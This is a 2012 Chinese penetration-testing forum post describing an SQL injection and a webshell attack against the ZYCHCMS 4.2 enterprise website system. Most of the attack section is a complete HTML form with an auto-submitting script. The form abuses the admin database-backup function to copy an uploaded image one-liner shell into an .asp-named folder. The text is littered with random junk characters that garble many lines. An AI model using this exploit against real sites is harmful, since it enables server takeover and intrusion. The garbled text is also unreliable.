中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]

作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

7 F4 Z) Z2 V. R1 \  f% A
# {( k4 |% }+ S# ]6 F
2 b8 L" k8 k( P/ A5 e, w6 t
. l" ?! c* E8 B, i. H( `( w! q影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
7 f! ?5 c+ ]7 q$ K& i ①SQL注射漏洞
& J2 l/ [. X9 v9 K 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp( t8 a# @+ c+ X& t+ b& ]
漏洞原因:未过滤
: f; n3 t, Y& v0 J+ g% e# W 漏洞代码:
/ A, O" [% A$ }& f 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。# x# D; f3 u$ x- _
修复方法:在文件开头加入代码3 T" _% J0 N! t, N( I* m+ F

& J( v# p  C) a6 i3 }1 e) _( X+ t: i6 t3 |: S7 s
②后台拿WBSHELL
" h  L2 E4 M3 z/ ?+ T: c2 c) y/ [ 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
5 W% I! @; M# u2 q, t 这里在网上找了一个,改了下,将就着用。
) P1 z3 [" S' [. Y5 j" o* Z 以下是代码本地提交代码- i$ h& F" E- J- _+ h
* t9 K3 ~' _$ h# H

! @4 O  x* Y, B, K) \<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
& V& L7 P& d+ A$ q3 H& | <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
- I' k4 o8 R0 F- l5 U  ~* d0 D <tr>, L2 J7 ^7 w! [) Q) M5 @
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>" [' P+ \. }8 P' d; p$ b
</tr>. n4 K$ K& j* n
<tr>9 v+ z& f# P  J( @
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
+ ~- c' p6 ]2 ?% u( ] </span>. Q7 ]/ @2 ~( _, j% \/ o7 z
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >* y3 J" X1 z0 z0 [2 R5 L$ y
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
) q9 I2 R" L& B2 w7 w  _- [- V& ^ <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>& [3 b3 u+ q& t/ `8 _! O
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d7 [. s; q/ @3 G$ t' r1 r6 i4 M
<div align=”left”>3 C+ z, \  }6 S* H$ p$ ^# ~$ x& I5 L
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />2 Y& Q5 n" i2 O9 B2 R& y
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>7 Q9 z) K  G- Y6 I; _; \
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />/ O% K8 R$ L' T7 f4 ^  E4 {3 Q
</div></td>: G4 v7 s, m6 j+ E3 b9 m% x( q4 P2 M. c
</tr>
" L, [. a$ |% P4 e/ v- J <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>% x# m# b4 N* w" m$ F( C: }
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
% q# R% I( Z- t  ]- m <td class=”td”><div align=”left”>
4 A3 h5 s1 A- r, S3 g/ I <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />, `7 y2 ~$ u' W
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
$ q/ y+ ]9 [1 w4 a! q- O) N4 x5 j2 ^ </tr>
( u* ^; d8 R- W; x1 j0 n# \) l7 h <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
  a* Q0 C  r7 w' O' p  d) e <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
1 L+ i8 H/ Q- \8 h/ `- `' x2 w <td class=”td”><div align=”left”>5 k7 K$ \4 G" f; \2 |( r' u
<input type=”submit” value=”确定备份” class=”btn”
" ?9 k7 a; c* b" g8 v) I </div></td>
3 x! E( J4 W' t* E </tr>
6 P; L& v0 w" ^) ~) t </table></td></tr></form>
# `$ H: x$ L3 F9 g0 I </table>
' Q" k7 e# o- l4 v </td>
0 |& e- q! F& d0 R7 Q  q0 [ </tr>
$ X2 {# ~/ @7 h7 Z9 o* a. K </table>
6 J% s8 x5 I/ { <script>& ?. H0 z" y) o* {
document.all.add.submit();$ s* K0 a: ~1 L( a
</script>
3 i. D- R  ], [5 p
, F5 V3 ^8 }8 m+ D5 p: B( a* N9 k/ b* C4 E$ }& a. S' ]9 Y. M& j

% L! x3 `/ x/ H3 ?, l
9 {: f3 }. u$ T$ A! P
+ `1 p  C* O/ V8 i$ e$ z% v. S. L

$ I6 i# v! q+ d& A: V( F' \
( ^8 R$ \) H; I& T( ?
" J- N9 Q3 B5 q8 A+ w) d6 G( f# R9 K, ^6 @& z& F5 `& G. U% O





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2